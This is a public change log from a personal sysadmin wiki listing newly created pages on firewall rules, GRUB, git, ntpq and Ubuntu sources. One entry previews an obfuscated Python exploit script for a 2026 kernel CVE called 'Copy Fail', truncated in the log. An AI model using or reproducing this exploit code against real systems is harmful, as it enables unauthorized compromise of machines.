All public logs
Jump to navigation
Jump to search
Combined display of all available logs of Omnia. You can narrow down the view by selecting a log type, the username (case-sensitive), or the affected page (also case-sensitive).
- 22:15, 7 July 2026 Kenneth talk contribs created page Windows/Ping (Created page with "== Firewall Allow Ping == Add: netsh advfirewall firewall add rule name="Allow ICMPv4 Ping" protocol=icmpv4:8,any dir=in action=allow Verify netsh advfirewall firewall show rule name="Allow ICMPv4 Ping" Remove: netsh advfirewall firewall delete rule name="Allow ICMPv4 Ping" == Powershell Version == New-NetFirewallRule -DisplayName "Allow ICMPv4 Ping" ` -Direction Inbound ` -Protocol ICMPv4 ` -IcmpType 8 ` -Action Allow")
- 07:00, 7 July 2026 Kenneth talk contribs created page Ntpq (Created page with "== ntpq -p == === Active Sync Time Source === # Look for the asterisk * in the first column, which identifies your currently selected active time source. # The reach column should ideally be 377 (octal), confirming the server has been successfully contacted over the last 8 polls. # The offset should be a very low number (typically under 100 milliseconds), showing how far off your clock is from the server. <pre> # ntpq -p remote r...")
- 06:10, 7 July 2026 Kenneth talk contribs moved page Linux/Change User and Home Directory to Linux/Rename User and Home Directory
- 05:52, 7 July 2026 Kenneth talk contribs created page Linux/Change User and Home Directory (Created page with " sudo usermod -l newuser -d /home/newuser -m olduser sudo groupmod -n newuser olduser sudo chown -R newuser:newuser /home/newuser")
- 17:41, 1 July 2026 Kenneth talk contribs created page GRUB (Created page with "== GRUB == == Dual Boot - Remember Last Choice == dual boot - How to get grub2 to remember last choice? - Ask Ubuntu - http://askubuntu.com/questions/148662/how-to-get-grub2-to-remember-last-choice Ubuntu: /etc/default/grub # GRUB_DEFAULT=0 GRUB_DEFAULT=saved GRUB_SAVEDEFAULT=true # GRUB_TIMEOUT=0 GRUB_TIMEOUT=60 note the GRUB_SAVEDEFAULT line needs to be added then run: sudo update-grub To force a default for next boot use: <ref>https://askubuntu.com/quest...")
- 17:40, 1 July 2026 Kenneth talk contribs moved page GRUB to GRUB Legacy without leaving a redirect
- 17:40, 1 July 2026 Kenneth talk contribs created page Grub-menu (Created page with "== grub-menu.sh == Ref: https://askubuntu.com/questions/599208/how-to-list-grubs-menuentries-in-command-line grub-menu.sh short # or grub-menu.sh long <pre> #!/bin/bash # NAME: grub-menu.sh # PATH: $HOME/bin # DESC: Written for AU Q&A: https://askubuntu.com/q/1019213/307523 # DATE: Apr 5, 2018. Modified: July 27, 2019 # UPDT: Scroll bar was outside of dialog box. Move windo border line. # $TERM variable may be missing when called via desktop shortcut CurrentTERM=...")
- 20:42, 30 June 2026 Kenneth talk contribs created page GitHub/Revert Commit (Created page with " cd repo && \ git checkout --no-track -b revert/mybad origin/main && \ git revert --no-edit 123456789")
- 23:30, 29 June 2026 Kenneth talk contribs created page GitHub/Action Runner Service (Created page with "== root user == /etc/systemd/system/github-runner.service <pre> [Unit] Description=GitHub Actions Runner After=network.target [Service] User=root WorkingDirectory=/opt/actions-runner Environment="RUNNER_ALLOW_RUNASROOT=1" ExecStart=/opt/actions-runner/run.sh Restart=always RestartSec=10 StandardOutput=journal StandardError=journal [Install] WantedBy=multi-user.target </pre> == gha user == /etc/systemd/system/github-runner.service <pre> [Unit] Description=GitHub...")
- 06:54, 27 June 2026 Kenneth talk contribs created page Games/Unravel Two (Created page with "== Potential Parameters == found by knowing "-fullscreen", then searching with strings and grep: <pre> $ strings UnravelTwo.exe | grep - | less ... -enable_log -enable_all_logs -log_to_memory -enable_osl -enable_osg -suppress_log_summary -disable_particles -enable_physics_debug_render -simstate_paused -limit_fps -bad_frames -exit_after_tests -enable_box2d_debug -no_letterbox -trial -no_vsync -no_assert_window -full_dmp -no_profile -full_dmp -no_profile -force_language -...")
- 21:04, 25 June 2026 Kenneth talk contribs created page Noice (Created page with " https://i.imgur.com/db3Eb2K.png")
- 18:31, 25 June 2026 Kenneth talk contribs created page CentOS/Python (Created page with "== Python 3.14 == yum install epel-release sudo yum install python3.14 python3.14-pip /usr/bin/python3.14 /usr/bin/pip3.14")
- 18:02, 25 June 2026 Kenneth talk contribs created page CentOS/tio (Created page with " yum install epel-release yum install tio")
- 19:19, 23 June 2026 Kenneth talk contribs created page Supermicro/SSG-121E-NE316R (Created page with "Supermicro SSG-121E-NE316R | 1U Storage Server https://www.supermicro.com/en/products/system/storage/1u/ssg-121e-ne316r Datasheet: https://www.supermicro.com/en/products/system/datasheet/ssg-121e-ne316r")
- 05:35, 17 June 2026 Kenneth talk contribs created page Git/Branch (Created page with "== Create new branch from last 10 commits == https://stackoverflow.com/questions/50992188/how-to-push-a-shallow-clone-to-a-new-repo <pre> # First, shallow-clone the old repo to the depth we want to keep git clone --depth=50 https://...@bitbucket.org/....git # Go into the directory of the clone cd clonedrepo # Once in the clone's repo directory, remove the old origin git remote remove origin # Store the hash of the oldest commit (ie. in this case, the 50th) in a var...")
- 05:32, 17 June 2026 Kenneth talk contribs created page Git/Signing Unsigned (Created page with "== Sign Current Commit == git commit --amend --no-edit -S == Rebase everything == Rebase everything until 'development' (or any hash) <ref>https://superuser.com/questions/397149/can-you-gpg-sign-old-commits</ref> git rebase --exec 'git commit --amend --no-edit -n -S' -i development Resign everything from root: git rebase --exec 'git commit --amend --no-edit -n -S' -i --root == Create new branch from last 10 commits == https://stackoverflow.com/questions/5099218...")
- 15:29, 4 June 2026 Kenneth talk contribs created page Mitmproxy (Created page with "https://www.mitmproxy.org/ mitmproxy is a free and open source interactive HTTPS proxy.")
- 15:28, 4 June 2026 Kenneth talk contribs created page Mitm (Created page with "A Man-in-the-Middle (MitM) attack is a cyberattack where a hacker secretly intercepts and relays communications between two parties. The victims believe they are talking directly to each other, but the attacker is secretly eavesdropping on or altering the data, often to steal login credentials or financial information See mitmproxy")
- 03:31, 30 May 2026 Kenneth talk contribs created page Linux/Open Files (Created page with "List processes with most open files: lsof | awk '{print $1}' | sort | uniq -c | sort -rn | head -10 The "Too many open files" error occurs when a process or user reaches the upper limit of allocated file descriptors (FDs), which in Linux includes network sockets, pipes, and regular files. To resolve this, you need to identify the culprit process and then adjust either the user-level session limits or the system-wide limits. Check session limits: Run ulimit -Sn to chec...")
- 22:09, 18 May 2026 Kenneth talk contribs created page Google/IssueTracker (Created page with " https://issuetracker.google.com/")
- 16:59, 18 May 2026 Kenneth talk contribs created page Movies (Created page with "== Taglines == Movie taglines are short, punchy marketing slogans used on posters and in trailers to capture a film's tone, genre, or core premise. Unlike plot summaries, they act as "vibe summaries" meant to quickly hook the viewer's attention and promise a specific cinematic experience.")
- 17:56, 15 May 2026 Kenneth talk contribs created page PCH (Created page with "== Platform Controller Hub (PCH) == Chipset PCH - A Platform Controller Hub (PCH) is a microchip on a motherboard that manages data flow and communication between the CPU and attached peripherals. It essentially acts as the traffic controller for your computer's input/output (I/O) functions. ref: <ref>https://en.wikipedia.org/wiki/Platform_Controller_Hub</ref> === What the PCH Does === * I/O Management: Handles communication for your USB ports, audio, SATA (hard driv...")
- 17:49, 15 May 2026 Kenneth talk contribs moved page X13SAE-F to Supermicro/X13SAE-F
- 17:46, 15 May 2026 Kenneth talk contribs created page X13SAE-F (Created page with " X13SAE-F | Motherboards | Products | Supermicro https://www.supermicro.com/en/products/motherboard/x13sae-f")
- 17:06, 5 May 2026 Kenneth talk contribs created page CVE/copy-fail-CVE-2026-31431 (Created page with "See CVE/CVE-2026-31431")
- 17:05, 5 May 2026 Kenneth talk contribs created page CVE/CVE-2026-31431 (Created page with "== Copy Fail == === copy_fail_exp.py === <pre> #!/usr/bin/env python3 import os as g,zlib,socket as s def d(x):return bytes.fromhex(x) def c(f,t,c): a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) try:u....")
- 20:10, 4 May 2026 Kenneth talk contribs created page Ubuntu/IPv6 (Created page with "== Disable IPv6 == <pre> cat >> /etc/sysctl.conf << "EOF" net.ipv6.conf.all.disable_ipv6 = 1 net.ipv6.conf.default.disable_ipv6 = 1 net.ipv6.conf.lo.disable_ipv6 = 1 EOF sudo sysctl -p </pre> Premenent: <pre> /etc/default/grub GRUB_CMDLINE_LINUX="ipv6.disable=1" sudo update-grub </pre>")
- 20:54, 1 May 2026 Kenneth talk contribs created page 8020 (Created page with "== 80/20 Aluminum == 80/20 aluminum is a modular, lightweight T-slot aluminum extrusion framing system, often called "The Industrial Erector Set®," used to build custom frames, machine guards, workstations, and robotics without welding. It is known for its versatility, durability, and easy assembly using T-slot connectors. Synonyms include T-slot aluminum extrusion, aluminum framing, t-slot aluminum structural framing, or aluminum profiles. Key Features and Usage Exam...")
- 20:50, 1 May 2026 Kenneth talk contribs created page 80/20 (Redirected page to 8020) Tag: New redirect
- 20:06, 1 May 2026 Kenneth talk contribs created page PPA (Created page with "== Ubuntu's Personal Package Archive - PPA == Similar to RHEL's EPEL")
- 16:14, 21 April 2026 Kenneth talk contribs created page Patch (Created page with "== patch ==")
- 16:14, 21 April 2026 Kenneth talk contribs created page Linux/patch (Created page with "See: * Linux/diff * patch * diff")
- 22:04, 20 April 2026 Kenneth talk contribs created page Ubuntu/Sources/22 (Created page with "== 22 - Jammy == <pre> $ cat /etc/os-release PRETTY_NAME="Ubuntu 22.04.5 LTS" NAME="Ubuntu" VERSION_ID="22.04" VERSION="22.04.5 LTS (Jammy Jellyfish)" VERSION_CODENAME=jammy ID=ubuntu ID_LIKE=debian HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" </pre> <pre> $ cat /etc/apt/sources.list # deb cdrom:[Ubuntu 22....")
- 22:02, 20 April 2026 Kenneth talk contribs created page Ubuntu/Sources/Jammy (Created page with "See Ubuntu/Sources/22")
- 22:02, 20 April 2026 Kenneth talk contribs created page Ubuntu/Sources (Created page with "== Sources == == 24 - Xenial == See Ubuntu/Sources/24 See Ubuntu/Sources/Xenial == 22 - Jammy == See Ubuntu/Sources/22 See Ubuntu/Sources/Jammy == 20 - Xenial == See Ubuntu/Sources/20 See Ubuntu/Sources/Xenial == keywords ==")
- 20:55, 14 April 2026 Kenneth talk contribs created page GitHub/GitHub Actions Workflow (Created page with "See GitHub/Workflow")
- 06:58, 10 April 2026 Kenneth talk contribs created page VBinDiff (Created page with "GitHub: https://github.com/madsen/vbindiff Build Source Code: # Ubuntu Dependencies: sudo apt install libtemplate-perl # Clone git clone https://github.com/madsen/vbindiff.git cd vbindiff git submodule update --init autoreconf -i ./configure make clean make ./vbindiff [binfile1] [binfile2] Press [enter] to jump to next difference between two bin files. Will be highlighted in red (beta 6 version) (or light cyan in beta 5 version)")
- 06:18, 8 April 2026 Kenneth talk contribs created page Games/StarRupture (Created page with "== Save Game Location == C:\Program Files (x86)\Steam\userdata\[YourSteamID]\1631270\remote\Saved\SaveGames")
- 22:56, 31 March 2026 Kenneth talk contribs created page Mermaid Charts (Created page with "== Mermaid Charts == The "official" Mermaid Editor plugin by the team behind the Mermaid open source project. https://www.mermaidchart.com/ https://mermaid.ai/ Mermaid Chart was born out of the Mermaid open source project and was founded by Knut Sveidqvist together with Open Core Ventures. The lead developers from Mermaid have joined the company and there is a strong connection between the project we all love and Mermaid Chart. Mermaid Chart brings resources to the...")
- 23:01, 27 March 2026 Kenneth talk contribs created page IDF (Created page with "IDF and MDF")
- 17:19, 25 March 2026 Kenneth talk contribs created page Ghostery (Created page with "== Ghostery == https://www.ghostery.com/ Chrome: https://chromewebstore.google.com/detail/ghostery-tracker-ad-block/mlomiejdfkolichcflejclcbmpeaniij Firefox: https://addons.mozilla.org/en-US/firefox/addon/ghostery/ == Ad Blocker == See also Ad Blocker == keywords == keyword: mispelling Ghosterly")
- 17:18, 25 March 2026 Kenneth talk contribs created page Ghosterly (Redirected page to Ghostery) Tag: New redirect
- 17:17, 25 March 2026 Kenneth talk contribs created page Firefox/Extensions (Created page with "== Extensions ==")
- 17:01, 23 March 2026 Kenneth talk contribs created page VM (Created page with "VM == VM Detection ==")
- 22:41, 22 March 2026 Kenneth talk contribs created page Git/Shallow (Created page with "== Shallow Clone == git clone --filter=blob:none <url> creates a blobless clone. ... git clone --filter=tree:0 <url> creates a treeless clone. ... git clone --depth=1 <url> creates a shallow clone. == Convert Cloned Repo to Shallow == <pre> git clone --depth-1 <repo> -b <branch> git clone --depth 1 org-1234@github.com:MYORG/MYREPO.git -b MYREPO/MYBRANCH MYBRANCH git clean -x -f -d . git pull --depth 1 git fetch --depth 1 git reflog expire --expire=0 git reflog...")
- 21:15, 22 March 2026 Kenneth talk contribs created page Linux/tree (Created page with "== Always Show Color == With less: <ref>https://superuser.com/questions/117841/when-reading-a-file-with-less-or-more-how-can-i-get-the-content-in-colors</ref> tree -a -C | less -R")
- 21:15, 22 March 2026 Kenneth talk contribs created page Linux/less (Created page with "== Always Show Color == less -R With ls: <ref>https://superuser.com/questions/117841/when-reading-a-file-with-less-or-more-how-can-i-get-the-content-in-colors</ref> ls --color=always -l | less -R With tree: <ref>https://superuser.com/questions/117841/when-reading-a-file-with-less-or-more-how-can-i-get-the-content-in-colors</ref> tree -a -C | less -R")
- 19:47, 17 March 2026 Kenneth talk contribs created page Pacman (Created page with "See MSYS2")
- 19:46, 17 March 2026 Kenneth talk contribs created page MSYS2 (Created page with " MSYS2 https://www.msys2.org/ Software Distribution and Building Platform for Windows MSYS2 is a collection of tools and libraries providing you with an easy-to-use environment for building, installing and running native Windows software. It consists of a command line terminal called mintty, bash, version control systems like git and subversion, tools like tar and awk and even build systems like autotools, all based on a modified version of Cygwin. Despite some of...")
- 18:30, 11 March 2026 Kenneth talk contribs created page Windows/SSHD (Created page with "== Install OpenSSH == Install the Inbox Version: <ref>https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell&pivots=windows-11</ref> # In Admin window: # Verify Admin (New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) # Verify Capabilities Get-WindowsCapability -Online | Where-Object Name -lik...")